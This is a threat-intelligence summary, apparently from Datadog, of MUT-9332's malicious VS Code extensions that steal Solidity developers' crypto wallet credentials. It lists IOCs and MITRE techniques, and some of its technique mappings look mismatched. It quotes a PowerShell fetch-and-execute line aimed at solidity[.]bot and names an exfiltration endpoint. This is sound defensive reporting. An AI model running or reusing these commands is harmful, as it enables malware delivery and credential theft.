Threat Research

The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions

DataDogHQ
The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions

Datadog Security Research uncovered a campaign by the threat actor MUT-9332 distributing three malicious VS Code extensions—solaibot, among-eth, and blankebesxstnion—that target Solidity developers on Windows. These extensions deploy complex multi-stage malware, including a payload hidden inside an image file, to steal cryptocurrency wallet credentials and maintain persistence on victim systems. #MUT9332 #solaibot #myau

Keypoints

  • Three malicious VS Code extensions—solaibot, among-eth, and blankebesxstnion—were discovered targeting Solidity developers on Windows and removed from the Marketplace after fewer than 50 total downloads.
  • The extensions use obfuscated JavaScript to deliver multi-stage payloads including PowerShell scripts, a malicious Chromium browser extension (extension.zip), and executables (myau.exe and myaunet.exe) that steal cryptocurrency wallet credentials.
  • The attack chain involves downloading and executing payloads from C2 domains like solidity[.]bot and myaunet[.]su, the latter previously linked to Monero cryptominer campaigns attributed to MUT-9332.
  • myau.exe disables Windows Defender protection via registry edits, folder exclusions, and disables recovery features, while myaunet.exe acts as an infostealer targeting LevelDB files of wallets, browsers, and communication apps.
  • The malware employs defense evasion tactics such as setting critical system process flags, modifying the hosts file, and blocking outbound connections to Microsoft update servers via firewall rules.
  • A notable infection technique includes retrieving a Base64-encoded payload hidden inside an image file hosted on the Internet Archive, decoded and executed by a corrupted and repaired VBS script.
  • The campaign remains active with updated payloads and C2 infrastructure, indicating likely ongoing attacks and evolving tactics from MUT-9332.

MITRE Techniques

  • [T1059.001] PowerShell – Used in multiple stages to download and execute payloads via “powershell -ExecutionPolicy Bypass -Command” scripts. (“powershell -nop -w hidden -c …”)
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence achieved by adding registry keys under HKEYCURRENTUSERSoftwareMicrosoft (“The script starts by adding a registry key (App = “crypto”) under HKEYCURRENTUSERSoftwareMicrosoft.”)
  • [T1060] Registry Run Keys / Startup Folder – Use of registry for Defender exclusions and persistence (“adds a random folder, %localappdata%, to Defender exclusions and registry settings”)
  • [T1140] Deobfuscate/Decode Files or Information – Use of obfuscated JavaScript and corrupted VBS scripts that repair themselves at runtime (“extra characters are removed at runtime to reveal the script”)
  • [T1105] Ingress Tool Transfer – Downloading additional payload components from multiple C2 URLs including solidity[.]bot, myaunet[.]su, and paste[.]ee (“PowerShell commands invoke irm https://solidity[.]bot/a.txt | iex”)
  • [T1497.001] Virtualization/Sandbox Evasion – Modifying Windows Defender settings and disabling recovery environments (“disables Windows Defender’s automatic submission”, “disabling the Windows Recovery Environment”)
  • [T1218] Signed Binary Proxy Execution – Using legitimate system binaries such as cscript.exe and cmd.exe to execute malicious scripts or commands (“Start-Process -FilePath “cscript.exe” …”)
  • [T1083] File and Directory Discovery – Enumeration of LevelDB files from various applications for credential theft (“enumerates LevelDB files within application data directories”)
  • [T1560] Archive Collected Data – Exfiltration of stolen wallet credentials and tokens via HTTP POST (“Data is exfiltrated via HTTP POST to https://m-vn[.]ws/bird.php”)
  • [T1486] Data Encrypted for Impact – Use of Base64 encoding to conceal the payload within an image file (“Base64-encoded text embedded in new_image.jpg”)

Indicators of Compromise

  • [File Hash] Malicious VS Code extension VSIX archives – among-eth.vsix: ce72b79e324371134db762fe70b8b1789af899d7217461bc3658a6bd84743eb6, blankebesxstnion.vsix: e19d5d8f941b9a98fbb3b65e1e6077fa00d97529e351e455297b0204ec07e9ed
  • [File Hash] Payload executables – myau.exe: c5c0228a1e0ba2bb748219325f66acf17078a26165b45728d8e98150377aa068, myaunet.exe: a1eadd41327bd8736e275627d3953944fe7089c032d72a3e429ff18ad0958ada
  • [Domains] Command and Control servers – solidity[.]bot (main C2 and early-stage payloads), myaunet[.]su (payload delivery and Monero cryptominer infrastructure)
  • [URLs] Payload download endpoints – http://paste[.]ee/d/0ykW3Z2K/0 (VBS script delivery), https://archive[.]org/download/newimage202505091852/newimage.jpg (Base64 payload image)
  • [File Names] Malicious payload indicators – extension.zip (Chromium browser extension), Launch.exe (renamed myau.exe), a.vbs (VBScript payload)

Read more: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint